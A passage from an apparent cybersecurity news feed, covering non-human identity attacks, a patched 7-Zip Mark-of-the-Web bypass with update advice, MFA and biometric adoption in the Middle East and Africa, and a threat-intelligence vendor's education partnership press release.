These scripts, in turn, could lead victims to phishing pages designed to steal login credentials, malware downloads, or rogue OAuth app authorization prompts granting attackers access to private repositories and data.

Finally, and bringing the year to a dramatic close, NHI was responsible for the US Treasury hack by Chinese threat actors, who gained access to "unclassified documents" after compromising the agency's networks. The attackers were able to exploit vulnerabilities in remote tech support software by misusing a leaked API key to gain unauthorized access.

The flurry of NHI attacks at the end of the year demonstrates extremely strong momentum heading into 2025. That does not bode well. 

Chief information security officers (CISOs) and security teams need to prioritize the emerging NHI threats roaring into the new year.

**About the Author**

Co-Founder & CEO, Entro Security

Itzik Alvas is co-founder and CEO at Entro Security and former healthcare organization CISO and information technology manager at Microsoft.

A cloud and security expert with more than 17 years of experience managing and building teams of hundreds of employees for both leading global enterprise companies and early-stage startups, always at the forefront of state-of-art security solutions used by governments, top intelligence agencies, data centers, cloud providers and industrial markets. Itzik served with the IDF's elite intelligence unit.

Will 2025 See a Rise of NHI Attacks?

A vulnerability in 7-Zip that could allow attackers to bypass the MotW security feature in Windows has been patched.

A patch is available for a vulnerability in 7-Zip that could have allowed attackers to bypass the Mark-of-the-Web (MotW) security feature in Windows.

The MotW is an attribute added to files by Windows when they have been sourced from an untrusted location, like the internet or a restricted zone. The MotW is what triggers warnings that opening or running such files could lead to potentially dangerous behavior, including installing malware on their devices. 7-Zip added support for MotW in June 2022.

The MotW also makes sure that Office documents that are marked with the MotW will be opened in Protected View, which automatically enables read-only mode and means that all macros will be disabled until the user allows them.

MotW security warning in file properties

For years, attackers were able to bypass the MotW by putting their malicious files in archives. This worked because the MotW is in fact another file that is attached to the main file as an Alternate Data Stream (ADS), and over the years we have seen many vulnerabilities in archivers where the ADS didn’t pass on the individual files when the archive was decompressed.

The same is true this time. Only the attacker will have to prepare an especially crafted nested archive. A nested archive means there is an open archive inside another open archive. Exploitation of the vulnerability also requires user interaction, meaning the target will have to visit a malicious page or open a malicious file.

If you’re a Windows user, check whether you are using version 7-Zip 24.09 or later. If you’re not, then they’ll need to update.

7-Zip does not have an auto-update function, so you will have to download the version that is suitable for your system from the 7-Zip downloads page.

**Other security measures**

There are some general safety tips to keep in mind when you’re handling archived files on a regular basis:

*   Keep track of how and where you obtained the archive.
*   Always be careful when opening archived files that you downloaded from the internet.
*   Make sure you are using an updated anti-malware solution that is capable of scanning inside archives, and you have that setting enabled.

Malwarebytes scan within archives option enabled

*   Keep track of who accesses archived files and when. This can help identify unauthorized access attempts and help monitor unwanted changes.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 7-Zip bug could allow a bypass of a Windows security feature. Update now 

Despite lagging in technology adoption, African and Middle Eastern organizations are catching up, driven by smartphone acceptance and national identity systems.

Source: Ground Picture via Shutterstock

National governments and companies in the Middle East and Africa continue to push for more widely available digital identity systems to allow citizens to connect and authenticate to digital government services and commercial services.

In Morocco, the government issued more than 4.6 million electronic identity cards in 2024 and expanded its digital infrastructure with a trusted third-party authentication platform in an effort to offer new services and cut cybercrime rates. More than 7.2 million people are now enrolled in the United Arab Emirates' official digital ID, known as UAE Pass, and can authenticate to websites. And the National Bank of Egypt has adopted a single sign-on infrastructure that will allow its employees to use a variety of authentication methods, and which will eventually be rolled out to its millions of customers.

The increasing use of multifactor authentication, especially efforts tied to smartphones or biometrics, have had success in the region because — in many cases — organizations have no technical debt to overcome, says Jim Sullivan, senior vice president of strategy and compliance at BIO-Key, which provided the technology for the National Bank of Egypt, as well as the largest bank in South Africa and the government of Nigeria.

"These are greenfield opportunities — it's tremendous," he says. "There's national initiatives that are well funded that are really bringing more biometrics to the fore, more awareness of the power of this technology."

Better authentication and the use of biometrics has taken off in the Middle East and Africa due to government concerns over cybercrime and fraud and international concerns over the lack of legal identities for more than 540 million people in the region. In Africa, cyber-risk is the No. 1 concern among businesses leaders, with 61% aiming to mitigate the threat in 2025, according to PwC's "2025 Digital Trust Insights: South Africa and Africa" report. In the Middle East, cyber-risk has fallen to the second greatest concern, behind digital and technology risks and tied with inflation and macroeconomic volatility, with 42% of organizations making mitigation of the cyber risks a priority, according to PwC's "2025 Digital Trust Insights: Middle East" report.

Despite that, only 19% of companies in Africa and 12% of companies in the Middle East are prioritizing investments in identity and access management (IAM) technologies, according to the PwC reports. Most companies are prioritizing the acquisition of data protection technologies, generative AI systems, and network security in the region, with the Middle East also prioritizing the addition of cyber insurance for the business.

**Biometrics Embraced by Mideast, African Markets**

A shift to biometrics, however, could change that. The significant reliance of smartphones for Internet access and digital transactions is leading many governments and organizations to adopt biometric-based identity systems and to use biometrics as a second factor of authentication for digital services.

Digital identity platforms, such as UAE Pass in the United Arab Emirates and Nafath in Saudi Arabia, integrate with existing fingerprint and facial-recognition systems and can reduce the reliance on passwords, says Chris Murphy, a managing director with the cybersecurity practice at FTI Consulting in Dubai.

"With mobile devices serving as the primary gateway to digital services, smartphone-based biometric authentication is the most widely used method in public and private sectors," he says. "Some countries, such as the UAE and Saudi Arabia, are early adopters of passwordless authentication, leveraging AI-based facial recognition and behavioral analytics for seamless and secure identity verification."

African nations have also rolled out national identity cards based on biometrics. In South Africa, for example, customers can walk into a bank and open an account by using their fingerprint and linking it to the national ID database, which acts as the root of trust, says BIO-Key's Sullivan.

"After they verify that that person is who they say they are with the Home Affairs Ministry, they can store that fingerprint \[in the system\]," he says. "From then on, anytime they want to authenticate that user, they just touch a finger. They've just now started rolling out the ability to do that without even presenting your card for subsequent business."

**An Easy Upgrade Path**

While the links to national identity systems means biometrics make sense, companies do not need to jump feet first into biometric-based authentication, BIO-Key's Sullivan says. In many cases, enterprise customers start with a single sign-on system that then transitions to biometrics for identity or as a second factor.

"The use case is typically one where you have users that are moving around, and you don't want them to carry a phone or a token — finance, retail point-of-sale, banking, and manufacturing, where you have workforces that are roving around a manufacturing shop floor," he says. "We have to accommodate the fact that a lot of companies still use traditional technologies and don't want to just make a big-bang switch, so we we allow them to sort of start with what they're doing now ... \[and\] as they start to see the power of having a biometric option, they can evolve to that."

The push for stronger authentication is not limited to the Middle East and Africa. Worldwide, Microsoft sees 600 million identity attacks per day, of which 99.9% could be blocked with strong identity protections, such as multifactor authentication. Yet adoption has been slow: At the beginning of 2023, for example, Microsoft found that only 28% of the company's Azure Active Directory customers had turned on strong identity protections, up from 22% in 2022. Starting in February, the company will require MFA for all user accounts accessing the Microsoft 365 admin center, according to the company.

Saudi Arabia has established strong identity standards through its National Cybersecurity Authority's Essential Cybersecurity Controls (ECC-1:2018), while the UAE has implemented similar requirements through the Information Assurance Regulation (IAR), FTI Consulting's Murphy says.

Next up: AI-augmented identity platforms, he says. AI-driven authentication solutions, including liveness detection and real-time facial recognition, will likely be part of the mix.

"As digital identity ecosystems expand," Murphy says, "AI-based authentication and real-time identity verification will become critical components of cybersecurity, ensuring both security and usability across industries."

**About the Author**

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT's Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline Journalism (Online) in 2003 for coverage of the Blaster worm. Crunches numbers on various trends using Python and R. Recent reports include analyses of the shortage in cybersecurity workers and annual vulnerability trends.

Mandatory MFA, Biometrics Make Headway in Middle East, Africa

Torrance, United States / California, 22nd January 2025, CyberNewsWire

**Torrance, United States / California, January 22nd, 2025, CyberNewsWire**

AI SPERA, a leading Cyber Threat Intelligence (CTI) provider, has collaborated with OnTheHub, a global provider of software in education, to deliver its integrated cybersecurity solution, Criminal IP, to students and educational institutions. This strategic initiative aims to enhance cybersecurity awareness and protection in the education sector by offering internationally compliant solutions at affordable prices.

Criminal IP will now extend its reach to educational institutions worldwide, reinforcing its growing presence in the global security market. Since its launch, Criminal IP has gained users in over 150 countries and formed strategic alliances with more than 40 global cybersecurity companies, including Cisco, Snowflake, Tenable, and VirusTotal.

(Criminal IP Lite Plan on OnTheHub)

OnTheHub is a worldwide operating platform that provides software and learning materials at discounted rates to educational organizations and their members. Through this collaboration, Criminal IP and OnTheHub seek to strengthen the cybersecurity frameworks of educational organizations on the platform, aligning with the ongoing digital transformation (DT) in education, particularly regarding Learning Management Systems (LMS). Students and researchers can access Criminal IP by redeeming coupons purchased through OnTheHub on the Criminal IP website, enabling them to utilize a globally recognized CTI platform at an affordable cost.

Criminal IP offers real-time risk analysis and vulnerability insights for global IP addresses and domains. Utilizing AI and machine learning technologies, the solution scans for security threats across various ports and devices, quickly identifying malicious IPs and domains while categorizing threat levels into five distinct tiers. Additionally, organizations can leverage Criminal IP ASM to oversee and manage IT assets, and Criminal IP FDS to detect unauthorized network access attempts during login or payment processes, all provided through a user-friendly SaaS model.

In terms of compatibility, Criminal IP offers an intuitive user interface (UI) and an integrated API, facilitating seamless integration with a variety of software and security solutions. This enables users to comprehensively evaluate security risks, including threat scores for IT assets, exposure of IoT devices, and phishing domain identification. Consequently, students and researchers associated with OnTheHub’s partner institutions will gain access to high-quality threat intelligence data and a robust platform for academic activities such as threat hunting, development, and research.

> AI SPERA CEO Byung-tak Kang commented, “Through this partnership, we are excited to provide more students and educational institutions with a globally recognized security solution at a reasonable price. We hope that Criminal IP will help students and researchers prevent security threats in educational environments and ensure a safe digital space for learning.”

**About AI SPERA**

AI SPERA, renowned for its advanced solutions, has expanded internationally, with ‘Criminal IP’ as its flagship offering. Operating in more than 150 countries, ‘Criminal IP’ is backed by enterprise-grade security solutions like ‘Criminal IP ASM’ and ‘Criminal IP FDS’. Strategic partnerships with global leaders such as Cisco, VirusTotal, and Quad9 have significantly enhanced ‘Criminal IP’s capabilities. AI SPERA’s ‘Criminal IP’ has recently entered the marketplace of major US data warehousing platforms, including Amazon Web Services (AWS), Microsoft Azure, and Snowflake, expanding its global reach for threat data.

**Contact**

**Michael Sena**  
**\[email protected\]**

Tag

#mac